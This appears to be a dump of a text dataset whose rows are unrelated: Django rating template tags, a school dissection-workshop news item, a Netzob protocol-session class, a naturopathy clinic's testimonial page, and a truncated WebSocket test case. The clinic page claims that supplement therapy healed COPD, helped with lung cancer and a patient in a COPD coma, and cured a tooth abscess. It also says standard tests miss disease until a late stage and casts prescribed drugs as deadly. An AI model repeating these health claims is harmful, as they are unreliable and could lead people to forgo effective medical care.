text
stringlengths 29
850k
|
|---|
from decimal import Decimal
from django import template
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.core.urlresolvers import reverse
from django.template.defaultfilters import slugify
from django_ratings.models import TotalRate
from django_ratings.forms import RateForm
from django_ratings.views import get_was_rated
from django.utils.translation import ugettext as _
from recepty import settings
register = template.Library()
DOUBLE_RENDER = getattr(settings, 'DOUBLE_RENDER', False)
#class RateUrlsNode(template.Node):
# def __init__(self, object, up_name, down_name, form_name=None):
# self.object, self.up_name, self.down_name = object, up_name, down_name
# self.form_name = form_name
#
# def render(self, context):
# obj = template.Variable(self.object).resolve(context)
# if obj and hasattr(obj, 'get_absolute_url'):
# context[self.up_name] = '%s%s/%s/' % (obj.get_absolute_url(), _('rate'), _('up'))
# context[self.down_name] = '%s%s/%s/' % (obj.get_absolute_url(), _('rate'), _('down'))
# elif obj:
# ct = ContentType.objects.get_for_model(obj)
# context[self.form_name] = RateForm(initial={'content_type' : ct.id, 'target' : obj._get_pk_val()})
# context[self.up_name] = reverse('rate_up')
# context[self.down_name] = reverse('rate_down')
# return ''
class RateUrlNode(template.Node):
    """Template node that puts the rating URL for an object into the context.

    If the target object defines ``get_absolute_url``, the rating URL is
    derived from it (``<absolute_url><rate-slug>/``). Otherwise the generic
    ``rate`` view URL is used and a pre-filled ``RateForm`` (carrying the
    content type and primary key) is stored in the context as well.
    """

    def __init__(self, object, url_var_name, form_name=None):
        self.object = object
        self.url_var_name = url_var_name
        self.form_name = form_name

    def render(self, context):
        target = template.Variable(self.object).resolve(context)
        if not target:
            return ''
        if hasattr(target, 'get_absolute_url'):
            context[self.url_var_name] = '%s%s/' % (target.get_absolute_url(), slugify(_('rate')))
        else:
            content_type = ContentType.objects.get_for_model(target)
            context[self.form_name] = RateForm(initial={'content_type' : content_type.id, 'target' : target._get_pk_val()})
            context[self.url_var_name] = reverse('rate')
        return ''
#@register.tag('rate_urls')
#def do_rate_urls(parser, token):
# """
# Generate absolute urls for rating the given model up or down and store them in context.
#
# Usage::
#
# {% rate_urls for OBJ as var_up var_down %}
#
# {% rate_urls for OBJ as my_form var_up var_down %}
#
# Examples::
#
# {% rate_urls for object as url_up url_down %}
# <form action="{{url_up}}" method="POST"><input type="submit" value="+"></form>
# <form action="{{url_down}}" method="POST"><input type="submit" value="-"></form>
#
# {% rate_urls for object as rate_form url_up url_down %}
# <form action="{{url_up}}" method="POST">{{rate_form}}<input type="submit" value="+"></form>
# <form action="{{url_down}}" method="POST">{{rate_form}}<input type="submit" value="-"></form>
# """
# bits = token.split_contents()
# if (len(bits) != 6 and len(bits) != 7) or bits[1] != 'for' or bits[3] != 'as':
# raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
# if len(bits) == 6:
# return RateUrlsNode(bits[2], bits[4], bits[5])
# else:
# return RateUrlsNode(bits[2], bits[5], bits[6], bits[4])
@register.tag
def rate_url(parser, token):
    """
    Fills template variable specified in argument ``tpl_var`` with URL for sending rating value.

    Usage::

        {% rate_url for object as tpl_var %}

    Example::

        {% rate_url for object as r_url %}
        <form action="{{r_url}}" method="POST">
            <input type="text" name="rating" value="0"/>
            <input type="submit" value="Rate it"/>
        </form>
    """
    bits = token.split_contents()
    # Validate the keyword positions too (consistent with the other tags in
    # this module); previously only the argument count was checked.
    if len(bits) != 5 or bits[1] != 'for' or bits[3] != 'as':
        # NOTE: message previously misspelled the tag name as "rate_rul".
        raise template.TemplateSyntaxError('rate_url template tag should be used like this: {% rate_url for object as tpl_var %}')
    return RateUrlNode(bits[2], bits[4])
class RatingNode(template.Node):
    """Template node that computes a rating for an object and stores it
    (as a string) in the template context.

    Three modes, selected by which bounds the tag supplied:

    * no bounds         -> raw total rating
    * ``max`` + ``step``-> rating normalized to <-max, max> with the given step
    * ``min`` + ``max`` + ``step`` -> rating rescaled to <min, max> with the given step
    """

    def __init__(self, object, name, max=None, step=None, min2=None):
        self.object, self.name = object, name
        # NOTE: the original code also did ``self.min = min`` — but there is
        # no ``min`` parameter, so it bound the *builtin* ``min`` function,
        # and the conditions below only worked because ``min`` is never None.
        # The bogus attribute is dropped; the real parameters are tested.
        self.max, self.step, self.min2 = max, step, min2

    def render(self, context):
        obj = template.Variable(self.object).resolve(context)
        if obj:
            if self.max is not None and self.min2 is not None:
                # Use locals instead of mutating node attributes: a Node is
                # reused across renders, so per-render state must not stick.
                low = Decimal(self.min2)
                high = Decimal(self.max)
                step = Decimal(self.step)
                possible_values = int((high - low) / step + 1)
                value = TotalRate.objects.get_normalized_rating(obj, 1, Decimal("1.0") / (possible_values / 2))
                value = value * (high - low) / 2 + (high + low) / 2
                # 'get_normalized_rating' can only yield an odd number of
                # distinct values.  With an even candidate count the result
                # may fall between two allowed values, so snap it to the
                # closest value of the form low + k*step within <low, high>.
                # (Replaces a hand-rolled loop whose break condition compared
                # an error against a candidate *value* — a latent bug.)
                if possible_values % 2 == 0:
                    candidates = [low + step * i for i in range(possible_values)]
                    value = min(candidates, key=lambda c: abs(c - value))
            elif self.max is not None:
                value = TotalRate.objects.get_normalized_rating(obj, Decimal(self.max), Decimal(self.step))
            else:
                value = TotalRate.objects.get_total_rating(obj)
            # Set as string to be able to compare value in template
            context[self.name] = str(value)
        return ''
@register.tag('rating')
def do_rating(parser, token):
    """
    Store the rating of the given object in the context under the given name.

    Usage::

        Total rating:
            {% rating for OBJ as VAR %}
        Rating normalized to <-X, X> with step Y:
            {% rating for OBJ max X step Y as VAR %}
        Rating rescaled to <X, Y> with step S:
            {% rating for OBJ min X max Y step S as VAR %}

    Notice:
        For correct results, (Y-X)/S must be an integer, and (Y-X)/S+1
        (the number of values the tag can produce) should preferably be
        odd, matching how 'get_normalized_rating' works.

    Examples::

        {% rating for object as object_rating %}
        object {{object}} has rating of {{object_rating}}

        {% rating for object max 1 step 0.5 as object_rating %}
        object {{object}} has rating of {{object_rating}} from (-1, -0.5, 0, 0.5, 1)
    """
    bits = token.split_contents()
    nbits = len(bits)
    if nbits == 5 and (bits[1], bits[3]) == ('for', 'as'):
        return RatingNode(bits[2], bits[4])
    if nbits == 9 and (bits[1], bits[3], bits[5], bits[7]) == ('for', 'max', 'step', 'as'):
        return RatingNode(bits[2], bits[8], bits[4], bits[6])
    if nbits == 11 and (bits[1], bits[3], bits[5], bits[7], bits[9]) == ('for', 'min', 'max', 'step', 'as'):
        return RatingNode(bits[2], bits[10], bits[6], bits[8], bits[4])
    raise template.TemplateSyntaxError(
        "{% rating for OBJ as VAR %} or {% rating for OBJ max X step Y as VAR %}")
class WasRatedNode(template.Node):
    """Stores a flag in the context telling whether the current request's
    user has already rated the given object."""

    def __init__(self, object, name):
        self.object, self.name = object, name

    def render(self, context):
        target = template.Variable(self.object).resolve(context)
        content_type = ContentType.objects.get_for_model(target)
        context[self.name] = get_was_rated(context['request'], content_type, target)
        return ''
@register.tag('was_rated')
def do_was_rated(parser, token):
    """
    {% was_rated for OBJ as VAR %}
    """
    bits = token.split_contents()
    if len(bits) != 5 or bits[1] != 'for' or bits[3] != 'as':
        raise template.TemplateSyntaxError("{% was_rated for OBJ as VAR %}")
    return WasRatedNode(bits[2], bits[4])
class TopRatedNode(template.Node):
    """Puts the list of top-rated objects (optionally restricted to the
    given models) into the template context."""

    def __init__(self, count, name, mods=None):
        self.count = count
        self.name = name
        self.mods = mods

    def render(self, context):
        context[self.name] = TotalRate.objects.get_top_objects(self.count, self.mods)
        return ''
@register.tag('top_rated')
def do_top_rated(parser, token):
"""
Get list of COUNT top rated objects of given model and store them in context under given name.
Usage::
{% top_rated 5 [app.model ...] as var %}
Example::
{% top_rated 10 as top_rated_objects %}
{% for obj in top_rated_objects %} ... {% endfor %}
{% top_rated 10 articles.article as top_articles %}
{% for article in top_articles %} ... {% endfor %}
{% top_rated 10 articles.article photos.photo as top_objects %}
{% for obj in top_objects %} ... {% endfor %}
"""
bits = token.split_contents()
if len(bits) < 3 or bits[-2] != 'as':
raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
count = int(bits[1])
mods = []
for mod in bits[2:-2]:
model = models.get_model(*mod.split('.', 1))
if not model:
raise template.TemplateSyntaxError, "%r .... TODO ....." % token.contents.split()[0]
mods.append(model)
return TopRatedNode(count, bits[-1], mods)
class IfWasRatedNode(template.Node):
    """Renders one of two branches depending on whether the current user
    has already rated the target object.

    The target is given either as a template variable name (``obj``) or
    directly as a content-type id / primary-key pair (``ct``/``pk``) —
    the latter form is what the DOUBLE_RENDER pass emits (see render()).
    """
    def __init__(self, nodelist_true, nodelist_false, obj=None, ct=None, pk=None):
        self.nodelist_true = nodelist_true
        self.nodelist_false = nodelist_false
        self.obj= None
        if obj:
            self.obj = template.Variable(obj)
        self.ct = ct
        self.pk = pk
    def render(self, context):
        # Resolve the target either from the template variable or from the
        # literal ct/pk pair parsed out of the tag.
        if self.obj:
            obj = self.obj.resolve(context)
            ct = ContentType.objects.get_for_model(obj).id
            pk = obj.pk
        else:
            ct = self.ct
            pk = self.pk
        if DOUBLE_RENDER and 'SECOND_RENDER' not in context:
            # First pass of a two-phase (cacheable) render: instead of picking
            # a branch now, re-emit the whole tag with the concrete ct:pk and
            # both pre-rendered branches, so the user-specific choice happens
            # during the second (per-request) pass.
            return u"{%% load ratings %%}" \
                u"{%% if_was_rated %(ct)s:%(pk)s %%}" \
                u"%(nodelist_true)s{%% else %%}%(nodelist_false)s{%% endif_was_rated %%}" % ({
                'ct' : ct,
                'pk' : pk,
                'nodelist_true' : self.nodelist_true.render(context),
                'nodelist_false' : self.nodelist_false.render(context),
            })
        if get_was_rated(context['request'], ct, pk):
            return self.nodelist_true.render(context)
        else:
            return self.nodelist_false.render(context)
@register.tag('if_was_rated')
def do_if_was_rated(parser, token):
"""
{% if_was_rated object %}...{% else %}...{% endif_was_rated %}
"""
bits = token.contents.split()
if len(bits) == 2:
kwargs = {}
# Opening tag
obj = bits[1]
if ":" in obj:
ct,pk = obj.split(":")
kwargs.update({"ct":int(ct), "pk":int(pk)})
else:
kwargs.update({"obj":obj})
# Nodelist true
nodelist_true = parser.parse(('else', 'endif_was_rated'))
token = parser.next_token()
kwargs.update({"nodelist_true":nodelist_true})
# Nodelist false
if token.contents == 'else':
nodelist_false = parser.parse(('endif_was_rated',))
kwargs.update({"nodelist_false":nodelist_false})
parser.delete_first_token()
else:
nodelist_false = template.NodeList()
return IfWasRatedNode(**kwargs)
raise template.TemplateSyntaxError, "{%% %s object %%}" % bits[0]
|
Students from SMART’s three secondary schools were able to get hands on with Operating Theatre Live, a unique dissection-based surgical experience.
The event, which was held at Liskeard School and Community College, saw students from Liskeard, saltash.net community school and Looe Community Academy relish the opportunity to work with lifelike cadavers to gain a better understanding of anatomy and physiology.
Students started the day by learning how to assess and communicate with their patient and then prepare them for surgery, before independently calculating the required concentration and dosage and anaesthetising their patient.
Once anaesthetised, students looked at the structure, role and physiology of the brain and eye. They were able to remove the brain from the cranial vault and identify structures such as the cerebellum. Following this, students learned to intubate their patient and dissected the lungs and heart.
Head of Science at Liskeard School, Mrs Michelle Inger, was delighted with the students’ response.
“The buzz and excitement in the room throughout the session was absolutely amazing, with students embracing the fantastic opportunity. Students were communicating in clinical terminology and were able to experience something truly unique. They had a brilliant time and left with a whole new world of opportunity. It was also great to invite our friends from Looe and Saltash to join us and take part,” she said.
One of the saltash.net students who took part in the trip, Matthew Sanders, really enjoyed the event.
“I found Operating Theatre Live very informative, as it clearly shows how the body functions. This trip will definitely benefit my Biology studies, as I now have a greater understanding about how the human anatomy works. I would like to thank Operating Theatre Live for the opportunity and also Liskeard School for hosting the event,” he said.
|
# -*- coding: utf-8 -*-
#+---------------------------------------------------------------------------+
#| 01001110 01100101 01110100 01111010 01101111 01100010 |
#| |
#| Netzob : Inferring communication protocols |
#+---------------------------------------------------------------------------+
#| Copyright (C) 2011-2014 Georges Bossert and Frédéric Guihéry |
#| This program is free software: you can redistribute it and/or modify |
#| it under the terms of the GNU General Public License as published by |
#| the Free Software Foundation, either version 3 of the License, or |
#| (at your option) any later version. |
#| |
#| This program is distributed in the hope that it will be useful, |
#| but WITHOUT ANY WARRANTY; without even the implied warranty of |
#| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the |
#| GNU General Public License for more details. |
#| |
#| You should have received a copy of the GNU General Public License |
#| along with this program. If not, see <http://www.gnu.org/licenses/>. |
#+---------------------------------------------------------------------------+
#| @url : http://www.netzob.org |
#| @contact : contact@netzob.org |
#| @sponsors : Amossys, http://www.amossys.fr |
#| Supélec, http://www.rennes.supelec.fr/ren/rd/cidre/ |
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Standard library imports
#+---------------------------------------------------------------------------+
import uuid
#+---------------------------------------------------------------------------+
#| Related third party imports
#+---------------------------------------------------------------------------+
#+---------------------------------------------------------------------------+
#| Local application imports
#+---------------------------------------------------------------------------+
from netzob.Common.Utils.Decorators import typeCheck, NetzobLogger
from netzob.Common.Models.Vocabulary.Messages.AbstractMessage import AbstractMessage
from netzob.Common.Utils.SortedTypedList import SortedTypedList
from netzob.Common.Utils.TypedList import TypedList
from netzob.Common.Models.Vocabulary.ApplicativeData import ApplicativeData
from netzob.Common.Models.Vocabulary.AbstractField import AbstractField
@NetzobLogger
class Session(object):
    """A session includes messages exchanged in the same session. Messages
    are automaticaly sorted.
    Applicative data can be attached to sessions.
    >>> import time
    >>> from netzob.all import *
    >>> # we create 3 messages
    >>> msg1 = RawMessage("ACK", source="A", destination="B", date=time.mktime(time.strptime("9 Aug 13 10:45:05", "%d %b %y %H:%M:%S")))
    >>> msg2 = RawMessage("SYN", source="A", destination="B", date=time.mktime(time.strptime("9 Aug 13 10:45:01", "%d %b %y %H:%M:%S")))
    >>> msg3 = RawMessage("SYN/ACK", source="B", destination="A", date=time.mktime(time.strptime("9 Aug 13 10:45:03", "%d %b %y %H:%M:%S")))
    >>> session = Session([msg1, msg2, msg3])
    >>> print session.messages.values()[0]
    [0;32m[1376037901.0 [0;m[1;32mA[1;m[0;32m->[0;m[1;32mB[1;m[0;32m][0;m 'SYN'
    >>> print session.messages.values()[1]
    [0;32m[1376037903.0 [0;m[1;32mB[1;m[0;32m->[0;m[1;32mA[1;m[0;32m][0;m 'SYN/ACK'
    >>> print session.messages.values()[2]
    [0;32m[1376037905.0 [0;m[1;32mA[1;m[0;32m->[0;m[1;32mB[1;m[0;32m][0;m 'ACK'
    """
    def __init__(self, messages=None, _id=None, applicativeData=None, name="Session"):
        """
        :parameter messages: the messages exchanged in the current session
        :type data: a list of :class:`netzob.Common.Models.Vocabulary.Messages.AbstractMessage.AbstractMessage`
        :parameter _id: the unique identifier of the session
        :type _id: :class:`uuid.UUID`
        :keyword applicativeData: a list of :class:`netzob.Common.Models.Vocabulary.ApplicaticeData.ApplicativeData`
        """
        self.__messages = SortedTypedList(AbstractMessage)
        self.__applicativeData = TypedList(ApplicativeData)
        # Assign through the property setters below so their type checks
        # apply; None defaults are normalized to empty collections first.
        if messages is None:
            messages = []
        self.messages = messages
        if _id is None:
            _id = uuid.uuid4()
        self.id = _id
        if applicativeData is None:
            applicativeData = []
        self.applicativeData = applicativeData
        self.name = name
    @property
    def id(self):
        """The unique identifier of the session.
        :type: :class:`uuid.UUID`
        """
        return self.__id
    @id.setter
    @typeCheck(uuid.UUID)
    def id(self, _id):
        # @typeCheck already rejects non-UUID values; None is rejected here.
        if _id is None:
            raise TypeError("Id cannot be None")
        self.__id = _id
    @property
    def messages(self):
        """The messages exchanged in the current session.
        Messages are sorted.
        :type: a :class:`netzob.Common.Utils.TypedList.TypedList` of :class:`netzob.Common.Models.Vocabulary.Messages.AbstractMessage.AbstractMessage`
        """
        return self.__messages
    def clearMessages(self):
        """Delete all the messages attached to the current session"""
        # Detach each message from this session before dropping it.
        for msg in self.__messages.values():
            msg.session = None
        self.__messages.clear()
    @messages.setter
    def messages(self, messages):
        if messages is None:
            messages = []
        # First it checks the specified messages are all AbstractMessages
        for msg in messages:
            if not isinstance(msg, AbstractMessage):
                raise TypeError("Cannot add messages of type {0} in the session, only AbstractMessages are allowed.".format(type(msg)))
        # Validation passed: replace the current content and back-link
        # each message to this session.
        self.clearMessages()
        for message in messages:
            self.__messages.add(message)
            message.session = self
    @property
    def applicativeData(self):
        """Applicative data attached to the current session.
        >>> from netzob.all import *
        >>> appData = ApplicativeData("test", Decimal(20))
        >>> session = Session(applicativeData=[appData])
        >>> print len(session.applicativeData)
        1
        >>> appData2 = ApplicativeData("test2", ASCII("helloworld"))
        >>> session.applicativeData.append(appData2)
        >>> print len(session.applicativeData)
        2
        >>> print session.applicativeData[0]
        Applicative Data: test=Decimal=20 ((8, 8)))
        >>> print session.applicativeData[1]
        Applicative Data: test2=ASCII=helloworld ((0, 80)))
        :type: a list of :class:`netzob.Common.Models.Vocabulary.ApplicativeData.ApplicativeData`.
        """
        return self.__applicativeData
    def clearApplicativeData(self):
        # Empty the typed list in place (it may not expose clear()).
        while(len(self.__applicativeData) > 0):
            self.__applicativeData.pop()
    @applicativeData.setter
    def applicativeData(self, applicativeData):
        for app in applicativeData:
            if not isinstance(app, ApplicativeData):
                raise TypeError("Cannot add an applicative data with type {0}, only ApplicativeData accepted.".format(type(app)))
        # NOTE(review): if the caller passes this session's own
        # applicativeData list, clearing it here empties the iterable before
        # the re-append loop below — confirm callers never do that.
        self.clearApplicativeData()
        for app in applicativeData:
            self.applicativeData.append(app)
    @property
    def name(self):
        return self.__name
    @name.setter
    @typeCheck(str)
    def name(self, _name):
        if _name is None:
            raise TypeError("Name cannot be None")
        self.__name = _name
    def getEndpointsList(self):
        """Retrieve all the endpoints couples that are present in the
        session.
        >>> from netzob.all import *
        >>> msg1 = RawMessage("SYN", source="A", destination="B")
        >>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
        >>> msg3 = RawMessage("ACK", source="A", destination="C")
        >>> session = Session([msg1, msg2, msg3])
        >>> print len(session.getEndpointsList())
        2
        >>> print session.getEndpointsList()
        [('A', 'B'), ('A', 'C')]
        :return: a list containing couple of endpoints (src, dst).
        :rtype: a :class:`list`
        """
        endpointsList = []
        for message in self.messages.values():
            src = message.source
            dst = message.destination
            # Direction is ignored: (A, B) and (B, A) count as the same
            # couple, so only the first orientation seen is recorded.
            endpoints1 = (src, dst)
            endpoints2 = (dst, src)
            if (not endpoints1 in endpointsList) and (not endpoints2 in endpointsList):
                endpointsList.append(endpoints1)
        return endpointsList
    def getTrueSessions(self):
        """Retrieve the true sessions embedded in the current
        session. A session is here characterized by a uniq endpoints
        couple.
        TODO: a more precise solution would be to use flow
        reconstruction (as in TCP).
        >>> from netzob.all import *
        >>> msg1 = RawMessage("SYN", source="A", destination="B")
        >>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
        >>> msg3 = RawMessage("ACK", source="A", destination="C")
        >>> session = Session([msg1, msg2, msg3])
        >>> print len(session.getTrueSessions())
        2
        >>> for trueSession in session.getTrueSessions():
        ...    print trueSession.name
        Session: 'A' - 'B'
        Session: 'A' - 'C'
        :return: a list containing true sessions embedded in the current session.
        :rtype: a :class:`list`
        """
        trueSessions = []
        # One sub-session per endpoint couple found above; each inherits
        # this session's applicative data.
        for endpoints in self.getEndpointsList():
            trueSessionMessages = []
            src = None
            dst = None
            for message in self.messages.values():
                if message.source in endpoints and message.destination in endpoints:
                    trueSessionMessages.append(message)
                    # Name the sub-session after the first message's direction.
                    if src is None:
                        src = message.source
                    if dst is None:
                        dst = message.destination
            trueSession = Session(messages=trueSessionMessages, applicativeData=self.applicativeData, name="Session: '" + str(src) + "' - '" + str(dst) + "'")
            trueSessions.append(trueSession)
        return trueSessions
    def isTrueSession(self):
        """Tell if the current session is true. A session is said to
        be true if the communication flow pertain to a uniq
        applicative session between a couple of endpoints.
        >>> from netzob.all import *
        >>> msg1 = RawMessage("SYN", source="A", destination="B")
        >>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
        >>> msg3 = RawMessage("ACK", source="A", destination="B")
        >>> session = Session([msg1, msg2, msg3])
        >>> print session.isTrueSession()
        True
        :return: a boolean telling if the current session is a true one (i.e. it corresponds to a uniq applicative session between two endpoints).
        :rtype: a :class:`bool`
        """
        if len(self.getTrueSessions()) == 1:
            return True
        else:
            return False
    @typeCheck(list)
    def abstract(self, symbolList):
        """This method abstract each message of the current session
        into symbols according to a list of symbols given as
        parameter.
        >>> from netzob.all import *
        >>> symbolSYN = Symbol([Field(ASCII("SYN"))], name="Symbol_SYN")
        >>> symbolSYNACK = Symbol([Field(ASCII("SYN/ACK"))], name="Symbol_SYNACK")
        >>> symbolACK = Symbol([Field(ASCII("ACK"))], name="Symbol_ACK")
        >>> symbolList = [symbolSYN, symbolSYNACK, symbolACK]
        >>> msg1 = RawMessage("SYN", source="A", destination="B")
        >>> msg2 = RawMessage("SYN/ACK", source="B", destination="A")
        >>> msg3 = RawMessage("ACK", source="A", destination="B")
        >>> session = Session([msg1, msg2, msg3])
        >>> if session.isTrueSession():
        ...    for src, dst, sym in session.abstract(symbolList):
        ...        print str(src) + " - " + str(dst) + " : " + str(sym.name)
        A - B : Symbol_SYN
        B - A : Symbol_SYNACK
        A - B : Symbol_ACK
        :return: a list of tuples containing the following elements : (source, destination, symbol).
        :rtype: a :class:`list`
        """
        abstractSession = []
        # Abstraction only makes sense on a single flow between two
        # endpoints; bail out (with a warning) otherwise.
        if not self.isTrueSession():
            self._logger.warn("The current session cannot be abstracted as it not a true session (i.e. it may contain inner true sessions).")
            return abstractSession
        for message in self.messages.values():
            symbol = AbstractField.abstract(message.data, symbolList)
            abstractSession.append((message.source, message.destination, symbol))
        return abstractSession
|
"Clinical Nutrition and Naturopathy Works!"
A message from Dr. Smith: "On this webpage, you will read either a client's personal testimony or a clinical nutrition case history on an actual client as it pertains to the various health challenges presented below. Because I have successfully helped thousands of clients improve their health since starting my business in 1981, the below obviously represents only a few of these clients, so periodically, new testimonies and case histories will be posted. Additionally, the below represents some of the most frequent health challenges people are suffering with today, as well as a few of the most severe or unusual cases. Therefore, If the health challenge(s) you are suffering with is not listed below, please feel free to contact me and I will be glad to share the improvement other clients have experienced, who were suffering with the same health challenges as you before they started Clinical Nutrition Therapy.." You may contact me by email by clicking this link to Services@AdvancedClinicalNutrition.com or by phone at (940) 761-4045, whichever you prefer."
My Dentist said I had an abscessed tooth and he would not clean my teeth until it was gone. He gave me an antibiotic prescription. However, I prefer to treat my body with whole food supplements, so, I contacted Dr. Smith. She designed an internal supplement program to strengthen my immune system and digest germs. She gave me an herbal powder and oil to make a poultice (paste) to apply externally around the infected tooth at bedtime. About two weeks later, I saw my dentist again. He said the abscess was gone and so he cleaned my teeth. He was amazed that Dr. Smith's recommendations helped to heal my tooth, gums and improved my dental hygiene. (Pat 72y, Wichita Falls, Tx).
My Chiropractor told me on my last visit that because of the Clinical Nutrition Therapy I am receiving from Dr. Smith that his chiropractic adjustments are 50% reduced from what they used to be and that he only needs to adjust me once every two months, instead of monthly. He also said, 'so whatever Dr. Smith is doing for you, keep it up' because it is really helping my musculo-skeletal system. (Tom 70y, Cypress, Tx).
A Word from Dr. Smith: "Besides physical injuries, the primary causes for subluxations (misalignments of the vertebrae of the spine) are Nutritional Deficiencies in the musculo-skeletal system, which then leads to pain and dysfunction of the organs and glands associated with the nerves in the vertebra as well as the muscles, joints and other parts of the musculo-skeletal system. Obtaining a Clinical Nutritional Analysis of your biochemistry to identify your nutritional deficiencies and then correcting them through Clinical Nutrition Therapy is required to hold Chiropractic Adjustments so vertebrae and spine realign and stay in place. This is what we do here at AdvancedClinicalNutrition.com.
When I was referred by my daughter, who was also helped by Dr. Smith, I felt like I had been tired all of my life. I am a Certified Public Accountant (C.P.A.) and during tax season, my energy was even more exhausted due to many long hours of work for the 2-3 months before April 15th. Within months my energy was restored. I have also lost 17 pounds, and a neck pain I have had for years and thought I would have to live with for the rest of my life is 90% improved already. This year during tax season, my energy was great. (Tom 68y, Cypress, Tx).
"I suffered with the symptoms of COPD for few years before I was referred to Dr. Smith, in six months my lungs were healed and I no longer had COPD."
To read more about the experiences of other clients who were suffering with COPD, Bronchitis, Emphysema, and Lung Cancer when they first started Clinical Nutrition Therapy, click on the PDF Document to the right. This document also includes the case history of a hospitalized patient, dying and in a COPD coma, when Clinical Nutrition Therapy was started.
A Word From Dr. Smith: The term "bio-identical" is misleading because when the hormone(s) is extracted from a plant, which means only the hormone is removed and the other nutrients that make it safe and effective is discarded. Only hormones ingested in the whole plant or food is truly bio-identical. Long-term use (four months or longer) of bio-identical hormones results in interfering with the body's ability to produce its own hormones and ultimately leads to more severe hormone imbalance. Bio-identical hormones are "plant-based drugs," which we call "nutritional drugs", that suppress hormone symptoms, just like synthetic (chemical) drugs (ex: Premarin), though Premarin is more toxic. Clinical studies have proven that long-term use of Premarin causes breast and uterine cancer.
(Continue reading this webpage for more on Symptoms of Hormone Imbalances.
"I had severe migraines for 30 years and chronic diarrhea for 15 years. Dr. Smith did nutritional testing and put me on whole food supplements. Within 6 months I got rid of the diarrhea. Within 3 months I started noticing the migraines were getting less frequent. Within a year I no longer had migraines. It is now 4, nearly 5 years later and the only headaches I have are my husband and kids and I can't remember the last time I had diarrhea!!!!!"
This patient posted her clinical nutrition success story anonymously in an online business directory review in regard to their experience at Advanced Clinical Nutrition, under the care of Dr. Smith.
Approximately six months ago, I was referred to Advanced Clinical Nutrition. I had been suffering with severe HOT FLASHES and sleepless nights; by the time morning arrived, I was exhausted and my day had just begun. The extra 10 pounds didn't help nor make me feel any better. I cannot tell you how well the therapeutic supplements from Advanced Clinical Nutrition have worked for me. My hot flashes have now subsided, no more pure exhaustion and I sleep like a rock star. I feel fantastic and couldn't be happier.
Thank you sooooo much Dr. Smith.
Unbeknownst to Dr. Smith, this patient posted her clinical nutrition success story on YellowPages.com and gave Dr. Smith a FIVE STAR RATING. Thank you Sondra.
At the young age of 23, Carol suffered with such severe episodes of rapid heartbeats that her entire body would shake like she was having a seizure without the rolling eyes. These episodes had been occurring several times a week for many months and sometimes she experienced several episodes in the same day. When not having these episodes, her heart beat was faster than normal.
Before contacting Dr. Smith, Carol had been to a number of physicians, who had performed extensive medical testing and heart stress examinations. However, because the results from these tests and exams were normal, none of these physicians could find the cause for her rapid heartbeats. Also, her condition was getting worse from the medicines they prescribed.
Because a Clinical Nutrition Analysis or interpretation of Laboratory Testing and Medical Examinations can identify causes that cannot be identified from a "medical" interpretation of the same tests and examinations, several of her relatives referred her to Advanced Clinical Nutrition. These relatives were also clients of Dr. Smith, who were experiencing improved health through Clinical Nutrition Therapy.
The fact that Carol had such severe rapid heartbeats, it was obvious she had a weak, dysfunctional heart and Dr. Smith's Clinical Nutrition Analysis proved this. Within a few weeks on Clinical Nutrition Therapy, Carol no longer experienced episodes where her body would shake when her rapid heartbeats were most severe.
Within a month, her heart had improved to normal heartbeat rhythm. Three months later, because her Clinical Nutrition Therapy had provided a sufficient amount of the specific nutrients her heart required for restoring its function, Carol's heart was strong and healthy, Dr. Smith discontinued her therapy. (Carol, 23y, Nocona, TX).
While reading the above, you may have wondered, "Since her symptom of rapid heartbeats was obviously a heart condition, why were all her medical laboratory tests and examinations, which were performed by several physicians, showing normal?" The reason is because her condition had not advanced to a life-threatening or disease stage, which is where the condition of any organ or gland must be in order to be identified by a medical interpretation and Carol's condition, was not in this advanced stage.
Stage 1 - nutritional deficiencies and toxicity. In Carol's case, these deficiencies and toxins were in her heart and circulatory system. If Stage 1 is not corrected, the causes become more severe and advance to Stage 2.
Stage 2 - biochemical imbalance. In Carol's case, long-term deficiencies and toxicity in time cause biochemical imbalances in the heart and circulatory system. If Stage 2 is not corrected, the causes become more severe and advance to Stage 3.
Stage 3 - organ, gland and/or body system dysfunction. In Carol's case, the rhythm of her heartbeats became irregular and rapid. If Stage 3 is not corrected, Carol would have advanced to Stage 4.
Stage 4 - disease develops in the dysfunctional organ, gland and/or body system and/or the state of the condition of the organ, gland or body system is life-threatening.
The first three stages can only be identified through a Clinical Nutrition Analysis. Carol was in stage 3 and had she not received Clinical Nutrition Therapy, in time, she would have advanced to the fourth stage, and in that stage her physicians would have been able to identify her heart condition through their medical interpretation of her lab tests and examinations. However, their drug therapy would have only suppressed the heart's ability to produce the symptoms of rapid heartbeats.
Their drug therapy would not have been able to help her heart heal and so given a bit more time, Carol's heart would have been so over-worked and stressed from constantly beating too rapidly that it would have stopped beating and Carol would have died at a young age. Because of the drugs suppressing her body’s ability to feel the rapid heartbeats, Carol would have had no warning of impending premature death.
Note: When medical tests are normal, this is always good news because it means that the condition for which the tests have been ordered has not advanced to the fourth stage. So now that you have ruled out disease or a life-threatening medical condition, the next step is to Clinical Nutrition Analysis of your medical tests to identify the cause of your symptoms and so the stage you are in can be identified. Then you can receive the appropriate Clinical Nutrition Therapy to help your body heal and prevent it from progressing to the advanced stage 4, where your physician is able to diagnose a disease, like cancer, or some other life-threatening condition in one or more organs, glands or body systems or even worse experience sudden death.
|
###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from case import Case
class Case9_2_1(Case):
    """WebSocket conformance case 9.2.1: echo of a 64 KiB binary message.

    Sends a single binary frame whose payload is expanded to 64k bytes and
    expects the peer to echo it back, byte-identical, within WAITSECS
    seconds; otherwise the case fails.
    """

    # Fixed duplicated word ("binary message message") in the report text.
